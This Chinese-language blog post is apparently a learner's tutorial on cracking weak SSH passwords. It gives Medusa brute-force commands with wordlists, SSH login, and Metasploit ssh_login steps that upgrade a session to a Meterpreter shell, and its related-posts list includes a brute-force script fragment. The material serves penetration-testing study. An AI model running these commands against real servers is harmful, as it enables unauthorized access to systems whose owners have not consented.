漏洞利用-SSH弱口令破解利用

已于 2022-03-26 13:53:18 修改
阅读量1.1w 收藏 30
点赞数
分类专栏: 安全 文章标签: 安全
于 2022-03-26 13:49:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_37278418/article/details/123754620
版权

一、 Medusa SSH弱口令破解

密码爆破工具:Medusa(美杜莎)
如果在设置SSH服务时,管理员设置了容易被猜解出来的用户名和密码(弱口令)。那么就可以使用对应的密码工具进行暴力破解弱口令。如果设置了非常复杂的话,就算有非常强悍的密码字典文件也没用,毕竟一个个试到猴年马月了。
可以尝试社工。
初级阶段还没学,学到后面再看。。

下面介绍Medusa对指定的ssh服务进行用户名和密码破解。

1. 直接使用用户名和密码字典文件破解

medusa -h IP地址 -u root -P 密码字典文件地址 -M ssh

这里的-u 是小写,而 -P 是大写

为了方便,我的密码字典文件就比较简单,如下图所示:
在这里插入图片描述
在这里插入图片描述
找到后会返回SUCCESS,这样就找到用户名是root,密码是toor了。

2. 使用用户名字典文件和密码字典文件破解

medusa -h IP地址 -U 用户名字典文件地址 -P 密码字典文件地址 -M ssh

这里的-U 是大写, -P 也是大写

为了方便,我的用户名字典文件也比较简单,如下图所示:
在这里插入图片描述
在这里插入图片描述

找到后会返回SUCCESS,这样就找到用户名是root,密码是toor,还有一个用户名是xianren,密码是toor了。

二、 SSH命令行工具登录

一般情况下Linux下都据有ssh客户端,用来登录ssh服务端。
可以使用ssh 用户名@IP地址,然后根据提示输入密码。(默认ssh登录是22号端口)
在这里插入图片描述

三、Metasploit利用SSH登录反弹Shell

使用Metasploit可以进行ssh登录(之前已经破解的用户名和密码),会自动建立对应的Bash shell连接。

  1. 首先打开Metasploit控制台
    在这里插入图片描述
  1. 使用ssh_login这个模块

use auxiliary/scanner/ssh/ssh_login

  1. 显示需要设置的选项

show options
在这里插入图片描述

  1. 设置rhosts,name和password

set rhosts IP地址
set username root
set password toor
在这里插入图片描述

  1. 建立bash shell

sessions -l
sessions -i 1
在这里插入图片描述

四、Metasploit获取Meterpreter Shell

利用获取的Bash shell,注入Metasploit中Meterpreter payload,从而获取更强大功能的shell。

exit结束之前的任务,重新使用run命令,启动模块。
使用sessions -u 2
sessions -l查看ID
sessions -i 3启动Meterpreter。
在这里插入图片描述
在这里插入图片描述

输入help后出现很多命令,命令太多了,就不往下截图了。

  1. 可以查看系统信息
    在这里插入图片描述

  2. 可以查看进程
    在这里插入图片描述

ssh弱口令暴力破解
weixin_45253622的博客
03-28 2561
ssh弱口令暴力破解 ssh安全外壳协议) SSH 为 Secure Shell 的缩写,由 IETF 的网络小组(Network Working Group)所制定;SSH 为建立在应用层基础上的安全协议。SSH 是较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程中的信息泄露问题。SSH最初是UNIX系统上的一个程序,后来又迅速扩展到其他操作平台。SSH在正确使用时可弥补网络中的漏洞SSH客户端适用于多种平台。几乎所有UNIX平台—包括HP-UX、L
网络攻击之-弱口令流量告警运营分析篇
村中少年的专栏
12-27 1729
弱口令的定义,WEB 弱口令数据包,中间件弱口令数据包,数据库弱口令数据包,邮件弱口令数据包,弱口令的suricata规则,弱口令识别方法,弱口令的告警研判,弱口令的处置建议等几个方面阐述如何通过IDS/NDR,态势感知等流量平台的弱口令类型的告警的线索,开展日常安全运营工作,从而挖掘有意义的安全事件。
简述两种爆破ssh弱口令的方法
顶峰
10-20 1653
ssh
4.4、漏洞利用-SSH弱口令破解
c10udz的博客
09-12 1752
原理:ssh服务用户名和密码弱口令注释:-h,指定目标主机;-u,用户名;-U,用户字典;-p,密码;-P,密码字典;-M指定破解服务类型ssh 用户名@IP地址输入密码即可登录使用metasploit进行ssh登录,会自动建立对应的bash shell连接。利用上一步获取的bash shell,注入meterpreter payload,从而获取更强大功能的shell。
SSH端口22完全沦陷:5个步骤渗透测试全过程
最新发布
wholeliubei的博客
03-11 1010
SSH(Secure Shell)是一种用于在不安全网络上建立安全连接的协议,主要用于远程服务器管理。由于 SSH 端口。SSH(Secure Shell)是一种用于在不安全网络上建立安全连接的协议,主要用于远程服务器管理。由于 SSH 端口 **22** 通常默认开放,且广泛用于服务器管理,因此它成为攻击者的重点目标。
SSH弱口令爆破服务器
fencecat的博客
08-27 1887
本文使用kali的hydra进行ssh弱口令爆破,获得服务器的用户名和口令,通过 ssh远程登录服务器,并对服务器的登录日志进行了分析,统计了是哪些用户对服务器进行了暴力破解以及暴力破解失败的次数。
6-5漏洞利用-SSH弱口令破解利用
山兔的博客
07-03 2031
破解完密码之后,获得对应的用户名,就可以使用ssh客户端软件,进行对应的登录,登录之后,我们就可以做很多的操作,获得shell,在shell当中,就可以执行对应的命令如果在设置SSH服务时,管理员为了方便记忆设置了容易被猜解出来的用户名和密码(弱口令)。那么测试人员就可以使用对应的密码工具进行身份验证暴力破解弱口令,或者是用户名和密码同时破解的这么一个过程。从而获得一些容易猜解出来的这些用户名和密码,破解出来就可以使用对应的用户名和密码登录系统ssh弱口令破解,验证了一句俗语,苍蝇不叮无缝的蛋,我们因为设置
弱口令爆破
tmzy1的博客
02-03 3557
弱口令爆破
漏洞利用-SSH安全防御
我是闲人的博客
03-29 6028
一、SSH修改默认端口 默认情况下,SSH使用22端口。为了安全,一般情况下都会修改默认端口。 修改/etc/ssh/ssh_config文件内容。找到Port ,把原来的22修改成想要的端口,一般修改后的端口比较大。 注意:修改之后必须重新启动SSH服务 二、SSH设置PGP登录 默认情况下,SSH使用用户名和密码进行远程登录。但也可以使用密钥对进行身份验证登录(公钥和私钥)。 这里我就使用xshell生成密钥 Xshell生成密钥 打开Xshell,在菜单栏点击“工具”,在弹出的菜单.
渗透测试-metasploit-ssh弱口令暴力破解
dongxieaitonglao的博客
03-04 1263
一. ssh: SSH 为 Secure Shell 的缩写,SSH 为建立在应用层基础上的安全协议。SSH 是较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程中的信息泄露问题。SSH最初是UNIX系统上的一个程序,后来又迅速扩展到其他操作平台。SSH在正确使用时可弥补网络中的漏洞。 传统的网络服务程序,如:ftp、pop和telnet在本质上都是不安全的,因为它们在网络上用明文传送口令和数据,别有用心的人非常容易就可以截获这些口令和数据。而且,这些服务程序
SSH简单爆破及漏洞利用
qq_45947924的博客
09-16 3790
SSH的环境搭建和banner信息获取比较简单,这里我就没有详细说明了,这里主要是讲一下漏洞利用安全防御。 1.Medusa SSH弱口令破解 如果在设置SSH服务时,管理员设置了容易被猜解出来的用户名和密码(弱口令)。那么测试人员就可以使用对应的密码工具进行暴力破解弱口令破解出来就可以使用对应的用户名和密码登录系统。 medusa -h 192.168.0.2 -u root -p 123456 -M ssh #直接输入用户名和密码 medusa -h 192.168.0.2 -u root -P /
ssh弱口令爆破脚本
Bu2n的博客
12-19 3093
@ toc import paramiko import argparse import socket import time import sys """ paramiko模块 需要pip install安装 测试环境:python版本3.10 使用方法:python xx.py进行查看帮助手册 """ description = "例如 python ssh弱口令爆破.py 192.168.175.134 -u burnchi -p e:/pass_lis.txt" # 进行ssh连接动作 de
ssh弱口令爆破
qq_56889067的博客
11-16 1491
直接使用msf 调用ssh_login模块 设置 靶机IP 密码字典所在路径 用户名 以及线程。 设置完后直接exploit (这里靶机用户密码是我自己设置的 所以 密码字典是我随便写入的几个密码所以爆的很快 如果在一般做题时候 他给你用户名密码字典 一般也不会太慢但是不会很快有的不会给你用户 会给你用户字典 就需要配置 user_file 用户名字典) ...
4.5、漏洞利用-SSH安全防御
c10udz的博客
10-02 949
在Linux下可以配置不能使用用户名和密码登录,只是用ssh pgp方式登录,规避ssh暴力破解。修改sshd_config中的PasswordAuthentication 中的yes为no。默认ssh使用用户名和密码进行远程登录,但是也可以使用密钥进行身份验证登录(私钥和公钥)利用iptables对多次连接验证错误,进行账户锁定120s。生成ssh密钥对,使用puttygen。
漏洞利用--SSH私钥免密登陆
qq_43757105的博客
08-28 752
在已知对方SSH私钥id_rsa的情况下,可以利用漏洞实现免密登陆,具体操作如下: 1.用kali ping 通对方ip 2.在kali上将获取到的id_rsa的权限提高 chmod 500 id_rsa 3.ssh免密登陆 ssh -i id_rsa 用户名@ip ...
ssh免密登陆及其漏洞利用
Cracker's Blog
02-27 4238
ssh 协议是基于 RSA 加密算法才能确保通讯是加密的,可靠的。 0x01:ssh ssh标准格式:ssh -p <port> <user>@192.168.1.1 客户端执行ssh-keygen生成公钥和私钥(保存在用户目录下的.ssh里),如: 将id_rsa.pub内容复制到服务端的/~/.ssh/authorized_keys 或者执行ssh-copy-i...
6-3漏洞利用-SSH环境搭建
山兔的博客
07-01 316
ubuntu下安装对应的ssh服务,需要安装的软件是openssh-server 可以看到安装完成,会在过程当中加载很多内容,下载并进行解包安装打开终端 在之前安装软件进程,没有结束的情况下,我们需要结束该进程,才能使用apt-get,我们也可以选择重启,rebort,干掉之前还在运行的进程以上,我们就完成了openssh-server软件的安装,也就完成了对应服务端的安装,当然服务端软件,不止包括openssh-server,还有其它的软件,可以拿过来使用启动、状态获取、关闭 我们光有服务端也是不能进行
Linux下ssh漏洞利用,【漏洞分析】SSH 命令注入漏洞(CVE-2017-1000117)分析
weixin_39890327的博客
05-13 1717
作者:RickyHao & C1tas@360CERT0x00 背景介绍A malicious third-party can give a crafted “ssh://…” URL to an unsuspecting victim, and an attempt to visit the URL can result in any program that exists on the...
4.3、漏洞利用-SSH简介
c10udz的博客
09-12 3698
ssh配置文件sshd_config中新增一行:DebianBanner no,可隐藏操作系统信息。Secure Shell Protocol(安全Shell协议)ssh服务的启动与关闭。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值